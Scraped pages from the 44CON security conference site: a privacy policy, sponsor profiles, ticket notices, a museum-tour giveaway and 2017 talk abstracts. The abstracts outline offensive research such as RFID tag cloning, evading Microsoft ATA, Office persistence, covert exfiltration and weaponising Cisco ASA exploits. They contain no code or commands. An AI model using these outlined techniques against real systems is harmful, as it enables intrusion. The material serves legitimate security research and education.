          • The organization’s yearly, and quarterly goals (as accurate as possible)
          • Your Information Security strategic goals for the current & next Fiscal Year (FY)
          • Your information security budget (doesn’t need to be specific dollar amounts, or vendor names… only ‘what do you spend money on?’)
          • The business’s top 3 “gripes about security”
          • 3 recent relevant business events in your industry (product recall of a competitor, industry buzz, etc)
          • 3 recent relevant information security events in your industry

          #####EOF##### 44CON Privacy Policy – 44CON

          44CON Privacy Policy

          This is a very boring document, but don’t let it put you off.

          TL;DR – We consider your privacy rights to be human rights wherever in the world you live. We take steps to secure the information we collect, and only use or share it under specific circumstances. If you ever want to talk to us about it, or request we do something with data held about you, just talk to us and we’ll do our best. If you have any questions, please contact dpo@44con.com.

          Sense/Net Ltd (“44CON”) Privacy Policy

          We consider privacy rights to be fundamental human rights. Regardless of where you live, you have the right:

          • to access your information and to receive information about its use.
          • to have your information corrected and/or completed.
          • to have your information deleted.
          • to restrict the use of your information.
          • to receive your information in a portable format.
          • to object to the use of your information.
          • to withdraw your consent to the use of your information.
          • to complain to a supervisory authority.

          When exercising these rights, there may be consequences affecting our ability to deliver access to the event. We’ll try to warn you of this at the time, but will carry out your request if you confirm you wish to proceed after being warned.

          Data Protection Officer: Marizel Fourie

          To exercise or query your information rights, please contact our Data Protection Officer at dpo@44con.com.

          Data collected

          We collect the following pieces of information:

          • We use cookies on websites for analytics, marketing and support.
          • Name, Contact information, IP address, cookie information, device information, geographical information from IP address and time of access through web and host analytics and logs.
          • Email address and any information (for example, food preferences) you provide when buying a ticket or contacting us via email.
          • Country of origin, Email address, name and any information you provide when using our CFP system.

          Your information is shared with the following third-parties:

          • Companies sharing directors with Sense/Net Ltd (Currently Alien8 Systems Ltd, Cortex Insight Ltd, Mandalorian Security Services Ltd and Raw Hex Ltd). Sense/Net Ltd doesn’t employ anyone. Instead, people employed by these companies support Sense/Net’s operations. The information is shared in order to support events such as 44CON.
          • Eventbrite (for ticketing), Google (mail, groupware and analytics), Hootsuite (Social media), Mailchimp (44con-announce list), Slack (internal chat), Shopify (Ticket and swag sales), Youtube and Vimeo (Talk and Workshop videos), Sched (Scheduling – speaker details), SagePay (for payment processing).
          • We also use other platforms such as Sched for scheduling, YouTube and Vimeo for video but your information is not provided by us, unless you’re the subject of the content (e.g. a speaker).
          • Volunteers working on events (e.g. our CFP panel and where relevant, ops leads). This is provided on a need-to-know basis and strictly for the purposes of making events run smoothly. Data is shared with volunteers on an individual, not company basis.

          Your information is not shared by us:

          • With sponsors, friends of 44CON or partners except as shown above or where specific explicit consent is granted (e.g. you asked a crew member to pass your email address to a sponsor).

          On consent

          When you send us information, you are deemed to have given us the consent to process it in accordance with our policy and the laws of England and Wales.

          You may withdraw consent by emailing our DPO in the first instance, or using function-specific features such as the unsubscribe button in every 44CON-announce list email, or their equivalents.

          Use of collected data

          How we use your information:

          • Administrative and business purposes, including but not limited to processing orders and refunds, travel bookings, contacting you with information about the event or those connected to it.
          • In order to meet contractual obligations.
          • Improving our systems and marketing through the use of analytics.
          • Advertising goods and services.
          • To fulfil legal obligations under the laws of England and Wales.

          How long we retain it for (in order of importance from most to least):

          • As long as we need it in order to comply with the laws of England and Wales (e.g. for tax purposes).
          • As long as we need it in order to perform the functions above.
          • As long as consent is not withdrawn (e.g. our announce list).

          How we secure your information:

          • We use Google’s G Suite to store the majority of our data used for operating the event, which allows us (amongst other things) to track who downloaded copies of it.
          • We use appropriate encryption methods (TLS, PGP, drive crypto) to protect personal data at endpoints and in transit.
          • We try to avoid collecting information where practical.

          Transfers of information outside of the EU:

          As an international event, some of our volunteers are based in and outside of the EU. Where we transfer information outside the EU, we’ll ensure appropriate safeguards are in place, for example our non-EU suppliers such as Google have self-certified as compliant with the EU-US privacy shield.

          Sensitive Personal Information

          We do not knowingly or intentionally collect what is commonly referred to as “sensitive personal information”. Please do not submit sensitive personal information about you to us.

          #####EOF##### 44CON 2017 Sponsors – 44CON

          44CON 2017 Sponsors

           

          Platinum Sponsors

          Falanx Cyber Defence

          Falanx Cyber Defence protect and defend businesses across all key sectors against global cyber security threats. Using their expertise, vigilance, and the latest tools and technology, Falanx Cyber Defence help companies fight against the ever-increasing risk of cyber attacks with a full service model that provides end to end coverage.

          The increased risk of cybercrime and the very public risk involved in reputation, earnings, and share price of affected companies means a new defined approach is needed. With GDPR arriving in 2018, increasing the DPA responsibilities of many organisations, there is a defined need to ‘do compliance better’, starting with understanding networks and platforms much better than most technology allows today.

          In response, Falanx Cyber Defence have brought together the latest technology stacks to develop MidGARD, a new Managed Detection & Response platform which is redefining risk analysis by offering world class remediation.

          MidGARD has been built to fully manage and detect cyber threats, providing analysts with the ability to investigate and intervene quicker and with more capability than ever before.

          The MidGARD platform
          MidGARD offers major security analytical capabilities by rethinking how we handle event data. SOC analysts working with MidGARD are seeing major increases in capability and reactive event handling. Backed up by monitoring and response capability from Falanx’s own SOC in the UK, MidGARD provides a dependable security enforcement layer.

          MidGARD meets and exceeds the expectations of enterprise and Government enterprise and cloud ready networks whose risk appetite face ever exceeding compliance, regulatory and privacy needs.

          MidGARD is also available as an SME appliance in a smaller form factor, the MicroSOC, offering the same world class features in a small form unit.

          Prices available on application.

          Why MidGARD?
          • Market-leading speed and scalability
          Built on big data foundations by security analysts, MidGARD is staggeringly quick and fully scalable whilst API friendly, offering major extensibility.

          • Cutting-edge technology
          With advanced capabilities built around machine learning, AI, and microservices, to help accelerate the process of identifying and responding to threats. React faster than ever before.

          • Data enrichment engine
          The data enrichment engine in MidGARD allows analysts to enrich base level data with additional context, improving the value of information and therefore the intelligence that can be gleaned from it.

          • Interactive ChatOps Speeds Reactive Capability
          MidGARD’s integration of ChatOps makes it easy for analysts to work together in one window to identify and respond to threats in real time, and share their intelligence with clients and colleagues.

          • A dynamic match for malicious hackers
          MidGARD’s integration of emerging tech matches the sophisticated technologies adopted by malicious hackers, making for an infinitely scalable, dynamic and agile platform

           Gold Sponsors 

          Beyond Security

          https://www.beyondsecurity.com/ssd.html

          SSD provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers, for researchers and will give you the fast response and great support you need to make top dollar for your discoveries. We are looking to acquire zero-day vulnerabilities, in different stages of research, affecting major operating systems, software, devices and report them to the vendors and to our clients. We believe researchers need to get paid for their efforts, that’s why we (Beyond Security) will acquire your research (money guaranteed) and report the vulnerabilities for you.

          You can read the SecuriTeam blogs here.

          Silver Sponsors
           

          Immersive Labs

          www.immersivelabs.co.uk

          We have built an online cyber skills portal which enables individual users to stream hands-on practical exercises. Individuals can login and choose from 100s of individual cyber skills to develop. Skills include ethical hacking, secure coding, reverse engineering, SOC analysis and cyber investigations.

          We crowd source labs from experts around the world. We employ social and gamification features and update labs weekly. Only a browser is required.

          Immersive Labs will be running this year’s CTF.

           

          Cortex Insight

          cortexinsight.com

          Cortex Insight’s easy-to-use threat and vulnerability management platform solves the complex Cybersecurity problems plaguing enterprises:

          • Too many vulnerabilities but not enough meaningful context!
          • Too much data but not enough useful information!
          • Too many silos but not enough risk remediation!
          • Cortex Insight works with your existing security solutions to help you maximise value.
          • Cortex Insight prioritizes vulnerabilities that pose actual risk to your business—not in theory, but in the real world.
          • Cortex Insight provides meaningful information on your vulnerabilities and prioritizes them based on a number of factors—not just risk scores

          For more information or to request a demo contact: info@cortexinsight.com

          Or come and speak to us at 44CON 2017 in the Cortex Insight Cafe

          Amazon

          amazon.jobs/infosec

          At Amazon, we are obsessed with customer trust. Information Security maintains this by guarding the confidentiality and integrity of Amazon and customer data. We assess risk, classify data and systems, detect potential intrusion, and render useless the value of data that may be leaked.

           

          Our teams span over 10 countries worldwide, and our focus areas include: security intelligence, application security, incident response, security operations, risk and compliance, acquisitions and subsidiaries, and external partner security. Our mission includes instilling awareness to safeguard all customer and employee data, applications, services, and assets. To accomplish this, we collaborate with Amazon organizations to build security best practices into enterprise wide systems. Our guidance and leadership equip our partners to maintain high security standards.

           

          We’re hiring top security talent around the globe. Visit amazon.jobs/infosec today. Stop by to meet our team, register to win Amazon prizes, and join the fun!

           

          BT

          www.bt.com

          With operations in over 180 countries supporting some of the world’s largest companies, nation states and critical national infrastructures, we have a unique perspective on cyber crime. Our front line position means that we see how and where attacks come. We’re constantly watching, learning, predicting and responding to the latest threats to protect our customers and BT.

          We know that a cyber attack can destroy a reputation overnight. We also know that security is the number one digital enabler, allowing a business to run at speed and to build customer trust and investor confidence.

          So we’ve built a team of 2,500 security experts in 14 global centres. It’s the same people who protect our business who also protect yours. This team use unique tools and insight to stay one step ahead of criminal entrepreneurs.

          As a global leader of Managed Security Services, we’re helping customers thrive in a digital world, by delivering world-class security solutions. These are underpinned by our professional services support, cloud of clouds strategy and excellent customer service.

           

           Microsoft

          www.microsoft.com

          Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services, and solutions that help people and businesses realise their full potential. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organisations helping to protect customers and the broader ecosystem.

           

          Other Event Sponsors

          Integrity

          www.integrity.pt

          INTEGRITY is an ISO 27001 certified and CREST member company. Our vision is to deliver worldwide innovative Information Security services on Auditing and Consulting where we provide our full expertise on the structuring and delivery of InfoSec value-added services, combining our expertise and our proprietary GRC Technology for a consistent and effective cyber risk reduction process for our clients. Such comprehensive services include persistent Pen-Testing (www.keepitsecure24.com), ISO 27001 (www.27001manager.com) and Third Party risk management (www.infosecrating.com) solutions supported by our GRC Platforms (www.integritygrc.com).

           

           

          Intezer

          www.intezer.com

          The only solution replicating the concepts of the biological immune system into cyber-security. Intezer provides enterprises with unparalleled Threat Detection and accelerates Incident Response.

          Our current offering includes:

          Intezer Code Intelligence™ solution:  Cloud API service for rapid file investigation, accelerating incident response/SoC operation.

          Intezer Immune System solution: an advanced, one-of-a-kind Threat Detection solution providing unparalleled level of control over the enterprise systems.

          With Intezer solutions, organisations get the most advanced protection against Fileless malware, APTs, code tampering and vulnerable software.

          Founded by the founder of CyberArk and IDF Cyber-security specialists.

          Tigerscheme

          www.tigerscheme.org

          Twitter: @tiger_scheme

          Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

          Tigerscheme was founded in 2007, on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring in a recognised and reputable company.

          Tigerscheme provides for career progression through entry level certification, intermediate level certification, and senior and technical specialist roles. Certification under Tigerscheme provides a formal recognition of an individual’s skills, and is awarded on the basis of a rigorous independent assessment against published and widely-accepted standards.

           

          Bugcrowd

          www.bugcrowd.com

          Bugcrowd delivers the ultimate in security assessment for the enterprise. The pioneer and innovator in crowdsourced security testing for the enterprise, Bugcrowd combines the power of more than 60,000 security researchers and its proprietary Crowdcontrol™ platform to surface critical software vulnerabilities, and level the cybersecurity playing field. Bugcrowd provides a range of public, private, and on-demand options that allow companies to commission a customized security testing program to fit their specific needs.

          CheckSec

          www.checksec.com

          Canopy: Make Reporting Great Again!

          Writing reports shouldn’t be hard. But for most of us, it’s a pain and the least fun part of our job. Canopy doesn’t make reporting fun, but it does make it a whole lot easier. 

          Stop by to say hello. Stay for a demo. 

          CheckSec: builders of Canopy and proudly sponsoring 44CON since 2012!

          Event Partners
          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts – Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder – it became quickly apparent after moving to London that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple: to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### 44CON 2019 Early-Bird Tickets are now on sale – 44CON

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          #####EOF##### Early Bird Tickets Sold Out! – 44CON

          Early Bird Tickets Sold Out!

          We opened our Early Bird Tickets last week and kept it quiet to give people a chance to get them, then when we announced them on our mailing list they went within an hour!

          If you missed your Early Bird Tickets, fear not. Our CFP is still open. If you have a great workshop or talk idea, don’t forget that accepted talks and workshops include free attendance (and in most cases cover travel and accommodation from anywhere in the world). We wrote a blog post on how to boost your chances here.

          If you’re itching to buy a ticket, regular tickets open at 8am GMT on the 10th of March, and will be available in our online shop.

          #####EOF##### fsecure – 44CON

          TNMOC Guided Tour Giveaway

          Proudly sponsored by F-Secure

          Following the recent prize draw for Steelcon tickets, it’s time for the next opportunity to win with 44CON.

          F-Secure are sponsoring a guided tour of The National Museum of Computing (TNMOC) which will take place on Saturday 1st September from 12:30.

          The tour will last around 2 hours and cover the full museum collection from the Colossus, war code breaking machines and the history of computing from 1940 to the start of the smartphone. Much of what is on display actually works, and the guide will describe how the computers were used, tell anecdotes on their design and operation, and operate some of the equipment.

          After the tour you will be able to stay in the museum if you’d like to go back and look at certain computers. TNMOC also has a few old gaming consoles which you’ll be able to play on.

          How to enter:

          1. Sign up to our newsletter
          2. Send an email to marizel@44con.com letting us know you’re interested in the TNMOC tour. Please either use the email you used to sign up to the mailing list or mention it in your email.
          3. Keep an eye on your emails in mid August to see if you’re a winner

          Winners will be contacted around the 15th of August and the tour will take place on the 1st of September 2018. Instructions/directions will be sent to the winners prior to the tour taking place.

          Detailed information about getting to TNMOC situated in Bletchley Park can be found here.

           

          #####EOF##### 44CON 2017 Talks – 44CON

          44CON 2017 Talks

          The Internet of Us

          Presented by: Don A. Bailey

          The Internet of Things has devolved into a four letter word on the tongues of information security researchers. As a result, we’ve endured the nonsensical rants of would-be hacker-pundits exclaiming every new technology must be junk that certainly can be hacked. Even if they’re right, they’re missing the point: the world is changing out from under them.

          IoT isn’t simply a trend that splices any given thing with a communications chip and rudimentary application. IoT is the next wave of computing. The boundaries between endpoints and cloud services are blurring into new abstractions with trendy names like ‘the fog’. As the blurring of resources continues, IoT won’t simply be things connecting to services, it will represent services extended inward toward our fingertips.

          This shift in computing has already started to upend the way we think about the effects of information security gaps. For example, most implementers and even auditors of IoT technology don’t understand that the greater risk to an insecure deployment isn’t to the consumer, it’s actually to the business. Many standard IoT models actually put the business at risk of bankruptcy due to the way services are exposed to endpoints, and how these services can be abused to create massive surges in fees.

          Yet, instead of identifying these shifts in architectural models, infosec pundits would rather shake their fist at the sky. We, as an industry, must do better not only for ourselves, but for the global community. Our job is to lift up the community and support it in its efforts to evolve our world. Otherwise, we will succeed in securing relics, leaving brave new worlds without an atmosphere.

          Without pointing fingers, this keynote presentation calls out the negative behaviours in IoT security punditry by demonstrating not only how new security models have slipped through the infosec community’s fingers, but how these gaps can be combatted and resolved with cost-effective strategies.

          At the end of this keynote, the audience should feel a new commitment toward infosec principles, and to new technological models. I hope to empower everyone to realize that The Internet of Things isn’t about stuff, it’s about Us. The Internet of Us.

          Linux Containers Made of Steel

          Presented by: Jessie Frazelle

          It is a well known fact that today Linux containers do not “contain.” This talk will cover the steps we have taken and can take in order to change the scepticism surrounding containers. This talk will cover active developments in the Linux kernel that are being worked on to get to this goal. It will go in depth into the design decisions of other similar technologies, such as Solaris Zones, VT-D, and VT-X, and how they can be applied to the primitives in Linux to reach a state of real “contained” sandboxes.

          (This talk sadly had to be cancelled)

          Cracking HiTag2 Crypto – Weaponising Academic Attacks for Breaking and Entering

          Presented by: Kevin Sheldrake

          HiTag2 is an RFID technology operating at 125KHz.  It is distinguished from many others in the same field by its use of 2-way communications for authentication and its use of encryption to protect the data transmissions – the majority of RFID technologies at 125KHz feature no authentication or encryption at all.  As a result it has been widely used to provide secure building access and has also been used as the technology that implements car immobilisers.

          In 2012, academic researchers Roel Verdult, Flavio D. Garcia and Josep Balasch published the seminal paper, ‘Gone in 360 Seconds: Hijacking with Hitag2’ that presented three attacks on the encryption system used in HiTag2.  They implemented their attacks on the Proxmark 3 device (an RFID research and hacking tool) and gave several high-profile demonstrations, but didn’t release any of their code or tools.  Since then, the forums supporting Proxmark 3 and RFIDler (another RFID hacking tool) have received many requests for implementations of these attacks, but so far none have been forthcoming.

          This talk covers implementation of all three attacks on RFIDler, supported by desktop computers.  The first attack uses a nonce replay to misuse the integrity protection of the comms in order to allow access to the readable RFID tag pages without needing to know the key.  The talk will cover how HiTag2 RFID works and will describe the first attack in detail plus the implementation challenges.  The attacks are weaponised and permit cloning of tags, which will be demonstrated.

          The tools used will be released after the talk.

          There is a workshop accompanying this talk which builds on the material covered and goes into further detail on a number of attacks, “Cracking HiTag2 Crypto: A Detailed Look at the Academic Attacks”. Attending this talk is a pre-requisite for the workshop.

          Chkrootkit: Eating APTs for breakfast since 1997

          Presented by: Nelson Murilo

          Chkrootkit will be 20 years old in 2017!

          The first chkrootkit release was in 1997 and it was written by Klaus (CERT.br team) and the presenter. Chkrootkit is a suite of POSIX shell scripts and some tools written in ANSI C, and runs like a charm in virtually all Unix environments without dependencies. It can detect several rootkits, malicious activity (some APTs included) and can do post mortem forensic analysis to detect kernel module activities and related indicators of compromise. This tool currently detects ~70 known Rootkits, Worms and many malicious activities. This talk will discuss the features and methods used to detect rootkits and malware in general, the limitations and potential options to improve it. Chkrootkit is an open source tool, so suggestions are always welcome.

          Biting the Apple that feeds you – macOS Kernel Fuzzing

          Presented by: Alex Plaskett and James Loureiro

          This talk details the use of MWR’s platform agnostic kernel fuzzing techniques to automatically identify critical flaws within Apple macOS.

          This talk will focus on how the researchers approached developing fuzzing automation to test the core subsystems of the XNU kernel and the insights gained, and also highlight architectural differences between other supported platforms which had to be addressed during this work.

          The old adage of ‘different fuzzers find different bugs’ will also be explored, as we looked into the effectiveness of using targeted fuzzing for specific components considered most likely to yield vulnerabilities.  

          An in-memory fuzzer based on a combination of static and dynamic analysis was also constructed to target these components with the aim to achieve greater code coverage, efficiency and to allow attacks on other privileged components within macOS via IPC.

          Finally we will discuss the issues discovered by the fuzzers and highlight future improvements which could be made to the tooling going forward to increase coverage and effectiveness.

          Various tools used during the research will be released after the talk.

          Breaking Historical Ciphers with Modern Algorithms

          Presented by: Klaus Schmeh

          Many old encryption methods are still hard to break today. For instance, cryptanalyzing a Turning Grille (a cipher device already known in the 18th century) is far from trivial. Many other encryption methods of historical importance can nowadays be broken, for instance Enigma messages from WW2, ADFGVX ciphertexts from WW1, bigram substitutions, cipher slide messages, and double column transpositions.

          This presentation will introduce a number of non-trivial ciphers that played an important role in history and explain how they can be broken with modern means. This will be demonstrated with original ciphertexts from past centuries, some of which were deciphered only recently. A number of interesting improvements in this area have been developed in recent years. Research is still going on.

          In spite of all these efforts, there are still surprisingly many historical encryption methods (and original ciphertexts) that are unbroken to date. Among others, Enigma messages with less than 70 letters, double column transpositions with long key words, and numerous cold war ciphers still baffle cryptanalysts. However, research goes on and we might see further improvements in the near future.

          The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots

          Presented by: Gabriel Ryan

          Most forms of WPA2-EAP have been broken for nearly a decade. EAP-TTLS and EAP-PEAP have long been susceptible to evil twin attacks, yet most enterprise organizations still rely on these technologies to secure their wireless infrastructure. The reason for this is that the secure alternative, EAP-TLS, is notoriously arduous to implement. To compensate for the weak perimeter security provided by EAP-TTLS and EAP-PEAP, many organizations use port based NAC appliances to prevent attackers from pivoting further into the network after the wireless has been breached. This solution is thought to provide an acceptable balance between security and accessibility.

          The problem with this approach is that it assumes that EAP is exclusively a perimeter defence mechanism. In a wireless network, EAP plays a subtle and far more important role. WPA2-EAP is the means through which the integrity of a wireless network’s physical layer is protected. Port-based access control mechanisms rely on the assumption that the physical layer can be trusted. Just as NACs can be bypassed on a wired network if the attacker has physical access to the switch, they can also be bypassed in a wireless environment if the attacker can control the physical layer using rogue access point attacks.

          In this presentation, we will apply this concept by presenting a novel type of rogue access point attack that can be used to bypass port-based access control mechanisms in wireless networks. In doing so, we will challenge the assumption that reactive approaches to wireless security are an acceptable alternative to strong physical layer protections such as WPA2-EAP using EAP-TLS.

          Red Team Revenge : Attacking Microsoft ATA

          Presented by: Nikhil Mittal

          Microsoft Advanced Threat Analytics (ATA) is a defence platform which reads information from multiple sources like traffic for certain protocols to the Domain Controller, Windows Event Logs and SIEM events. The information collected is used to detect Reconnaissance, Credentials replay, Lateral movement, Persistence attacks etc. Well known attacks like Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Golden Ticket, Directory services replication, Brute-force, Skeleton key etc. can be detected using ATA. Whenever communication to a Domain Controller is performed using protocols like Kerberos, NTLM, RPC, DNS, LDAP etc., ATA will parse that traffic for gathering information about not only possible attacks but user behaviour as well. It slowly builds an organizational graph and can detect deviations from normal behaviour.

          This talk focuses on identifying and attacking ATA installations. Can ATA be attacked to suppress alerts? How noisy is it to attack ATA? How can alerts related to a particular identity (user and computer) be exempted? How can ATA be controlled and crippled remotely?

          The talk will be full of live demonstrations.

          BaRMIe – Poking Java’s Back Door

          Presented by: Nicky Bloor

          Java’s Remote Method Invocation (RMI) enables developers to seamlessly interact with objects that reside within another Java Virtual Machine (JVM), potentially on a remote server. As is often the case, the trade-off for seamless remote method invocation is security. While many consider RMI to be outdated and uninteresting, many in-service implementations remain trivial to exploit, and there are many questions to consider. How common is RMI? How many RMI services are making the same mistakes when it comes to security? What else could I do with arbitrary RMI services? Can RMI services be secured, and if so, how?

          I set about finding answers to those questions. Along the way I wrote a tool to help with enumeration of RMI services, called BaRMIe, which eventually became an exploitation tool following the discovery of vulnerabilities within Java itself.

          During this talk I’ll look at the work I did and present the results of my research including answers to my original questions and the exploitation tool I wrote, BaRMIe.

          Persisting with Microsoft Office: Abusing Extensibility Options

          Presented by: William Knowles

          One software product that red teamers will almost certainly find on any compromised workstation is Microsoft Office. This talk will discuss the ways that native functionality within Office can be abused to obtain persistence.

          A wide range of techniques for abusing various add-in mechanisms will be covered. Each persistence mechanism will be discussed in terms of its relative advantages and disadvantages for red teamers. In particular, with regards to their complexity to deploy, privilege requirements, and applicability to Virtual Desktop Infrastructure (VDI) environments which hinder the use of many traditional persistence mechanisms.

          The talk will finish with approaches to detection and prevention of these persistence mechanisms.

          See no evil, hear no evil: Hacking invisibly and silently with light and sound

          Presented by: Matt Wixey

          Traditional techniques for C2 channels, exfiltration and exploitation are often frustrated by the growing sophistication and prevalence of security protections, monitoring solutions, and controls. Whilst all is definitely not lost from an attacker’s perspective – we constantly see examples of attackers creatively bypassing such protections – it is always beneficial to have more weapons in one’s arsenal, particularly when coming up against heavily-defended networks and highly-secured environments.

          This talk presents and demonstrates a number of techniques and attacks which utilise light and/or sound, covering everything from C2 channels and exfiltration using light and near-ultrasonic sounds, to disabling and disrupting motion detectors; from a DIY laser microphone to sending a drone into the stratosphere; from trolling friends, to jamming speech, and demotivating malware analysts.

          This talk not only provides attendees with a new suite of techniques and methodologies to consider when coming up against a well-defended target, particularly for on-site engagements, but also demonstrates – in a hopefully fun and practical way – how these techniques work, their pros and cons, and possible future developments.

          I also consider mitigation against some of these attacks, where applicable, and encourage defenders to consider how and why some of these attacks might work where traditional methods fail.

          Secrets Of The Motherboard (Shit My Chipset Says)

          Presented by: Graham Sutherland

          Modern motherboards are fairly daunting pieces of hardware. They’re full of closed-source firmware, undocumented and obscure parts, incredibly complex components, and are developed by people with vast domain-specific knowledge. They’re also full of exciting security-impacting technologies like IME, AMT, SMM, TPM, and UEFI. But, despite the apparent difficulty, what if we took a stab at trying to understand these devices and what security looks like at the bare-metal level? The real secret is that it’s not as hard as it looks.

          This talk runs through a list of weird and wonderful things I found while reading datasheets for Intel chipsets and other motherboard parts. Along the way we’ll explore unusual functionality not intended for production use, features we can exploit to build more open platforms, potential security pitfalls in motherboard design, and the challenges faced by certain industries in attempting to secure hardware for reuse.

          Cisco ASA Episode 2: Striking back – Internals and Mitigations

          Presented by: Cedric Halbronn

          In 2016, two critical vulnerabilities were published that targeted Cisco ASA (Adaptive Security Appliance) firewalls. Even though the exploits for both are public, they are restricted to specific ASA versions and there is no public tool to understand how they work. This talk is about ASA internals, the reverse engineering involved and tools we have developed to better weaponize exploits.

          In addition to covering previously unpublished details of Cisco ASA internals and how the exploit was generalised to apply to over 100 versions and made 100% reliable, the talk will cover a number of tailor-made tools developed to assist in the reverse engineering and exploit production. The tools will be released after the talk.

           

          Inside Android’s SafetyNet Attestation: What it can and can’t do lessons learned from a large scale deployment

          Presented by: Colin Mulliner

          There are many reasons for protecting your mobile applications against modification and tampering. Until recently you had to use third party tools or implement your own app integrity checks and device rooting checks. Today you can use Android’s SafetyNet Attestation infrastructure to ensure the integrity of your application and the user’s device. Unfortunately, SafetyNet Attestation is not well documented by Google.

          This talk provides a deep dive into SafetyNet Attestation. We show what level of attestation SafetyNet provides and what it can’t do. The talk is based on the lessons learned from implementing SafetyNet Attestation for an app with a large install base. We turned SafetyNet upside down to find its flaws and shortcomings. This talk will provide you with everything you need to know about Android’s SafetyNet Attestation and will help you to implement and use it in your app.

          Subgraph OS: Hardening a Linux Desktop

          Presented by: David Mirza Ahmad

          Subgraph OS is an operating system designed to provide a hardened Linux desktop resistant to network and malware attacks.

          Subgraph includes a hardened kernel, application sandboxing with per-application network rules, an application firewall and extensive security monitoring and alerting.

          This presentation will outline the overall design and goals of the project and detail progress so far, including a detailed description of the sandboxing implementation.

          Hypervisor-Assisted Ring0 Debugging with radare2

          Presented by: Lars Haukli

          Reverse engineering protected code operating in kernel mode can be challenging. More advanced protection mechanisms typically combine obfuscation or encryption with techniques that hinder dynamic analysis. Some code will not run at all when certain debugging features are enabled by the OS.

          radare2 is a comprehensive open-source framework for reverse engineering, that takes you to a magical world where control flow graphs of disassembled code are displayed in ASCII art. The framework combines a vast set of code analysis capabilities, which you can make use of in a variety of ways.

          Enter the idea of connecting radare2 to a virtual machine, giving it direct access to guest physical memory. The intent is to debug Ring0 code running inside the guest, with the debugging mechanism operating exclusively on the host.

          This talk will cover the use of radare2 on a Linux host accessing a Windows VM.

          Lessons Learned Hunting IoT Malware

          Presented by: Olivier Bilodeau

          Permeating the entire spectrum of computing devices, malware can be found anywhere code is executed. Embedded devices, of which many are a part of the Internet of Things (IoT), are no exception. With their proliferation, a new strain of malware and tactics have emerged. This presentation will discuss our lessons learned from reverse-engineering and hunting these threats.

          During our session, we will explain the difficulty in collecting malware samples and why operating honeypots is an absolute requirement. We will study some honeypot designs and will propose an IoT honeypot architecture comprising several components like full packet capture, a man-in-the-middle framework and an emulator.

          Additionally, reverse-engineering problems and practical solutions specific to embedded systems will be demonstrated. Finally, we will explore three real-world cases of embedded malware. First, Linux/Moose, a stealthy botnet that monetizes its activities by selling fraudulent followers on Instagram, Twitter, YouTube and other social networks. Second, a singular ELF binary of the MIPS architecture which serves as a dropper. Third, LizardSquad’s LizardStresser DDoS malware known as Linux/Gafgyt. Attendees will leave this session better equipped to hunt this next generation of malware using primarily open source tools.

          So You Want to Hack Radios

          Presented by: Marc Newlin and Matt Knight

          The Age of the Radio is upon us: wireless protocols are a dime a dozen thanks to the explosion of the Internet of Things. While proprietary wireless solutions may offer performance benefits and cost savings over standards like 802.11 or Bluetooth, their security features are rarely well-exercised due to lack of access to these interfaces. The adoption of Software Defined Radio (SDR) by the security research community has helped shift this balance, however SDR remains a boutique skillset. Join us as we lift the veil on SDR and show that a PhD is not needed to pwn the Internet of Things Radios.

          This session offers a tutorial on how to apply Software Defined Radio, with an emphasis on the “Radio” part. Rather than glazing over RF basics, we will frame our entire discussion about reverse engineering wireless systems around digital radio fundamentals.

          We begin with an offensively short crash course in digital signal processing and RF communication, covering just enough to be dangerous, before introducing a reverse engineering workflow that can be applied to any wireless system. We will show how to use this workflow to recover and inject packets from/into a variety of devices with proprietary modulations.

          Attendees should expect to walk away with practical knowledge of how to apply SDR to examine proprietary wireless protocols. We will release GNU Radio flowgraph templates and shell scripts to get attendees started.

          Checking BIOS protections offline with just the firmware updates

          Presented by: Oleksandr Bazhaniuk and Yuriy Bulygin

          Vulnerabilities in system firmware allow adversaries to bypass almost any protection used in the operating system, virtual machine manager and other software. System firmware attacks bypass Secure Boot, software based full-disk encryption and virtualization-based security. Threats exploiting such vulnerabilities can extract secrets from operating system memory, subvert secure/trusted VMs and even hypervisors, install stealthy and persistent implants and even brick physical systems.

          We’ve discovered a number of such vulnerabilities in the past and developed an open source framework to automate analysis. Despite these risks there are still many modern systems which do not protect their main BIOS/UEFI firmware. We decided to analyze thousands of UEFI firmware updates from multiple platform vendors and discovered hundreds of vulnerabilities, indicating that corresponding systems lack any basic firmware protections in ROM or signed firmware updates. We’ll present the process, findings and limitations of such offline analysis of vendor firmware update images.

          Hide Yo Keys, Hide Yo Car: Remotely Exploiting Connected Vehicle APIs and Apps

          Presented by: Aaron Guzman

